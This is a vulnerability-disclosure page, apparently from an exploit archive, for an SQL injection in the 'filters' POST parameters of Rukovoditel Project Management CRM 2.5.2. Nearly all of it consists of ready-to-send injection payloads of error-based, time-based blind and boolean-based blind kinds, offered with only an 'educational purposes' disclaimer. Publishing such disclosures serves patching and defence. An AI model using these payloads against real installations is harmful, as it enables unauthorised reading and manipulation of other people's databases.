Exploits / Vulnerability Discovered : 2020-01-16 |
Type : webapps |
Platform : php
This exploit / vulnerability Rukovoditel project management crm 2.5.2 filters sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Rukovoditel Project Management CRM 2.5.2 - 'filters' SQL Injection
# Google Dork: N/A
# Date: 2020-01-15
# Blog: https://fatihhcelik.blogspot.com/
# Exploit Author: Fatih Çelik
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://sourceforge.net/projects/rukovoditel/
# Version: 2.5.2
# Tested on: Kali Linux
# CVE : N/A
# Parameter: filters[1][value] (POST)
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(6543=6543,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ApLW
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0&filters[1][name]=users_id&filters[1][value]=1' AND (SELECT 1479 FROM (SELECT(SLEEP(5)))WpOr)-- kARm
# Parameter: filters[0][value] (POST)
# Type: boolean-based blind
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: page=1&filters[0][name]=type&filters[0][value]=-6686' OR 4511=4511#&filters[1][name]=users_id&filters[1][value]=1
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 4167 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(4167=4167,1))),0x7162787871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- nQyo&filters[1][name]=users_id&filters[1][value]=1
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=1&filters[0][name]=type&filters[0][value]=0' AND (SELECT 6373 FROM (SELECT(SLEEP(5)))ytRS)-- QpIm&filters[1][name]=users_id&filters[1][value]=1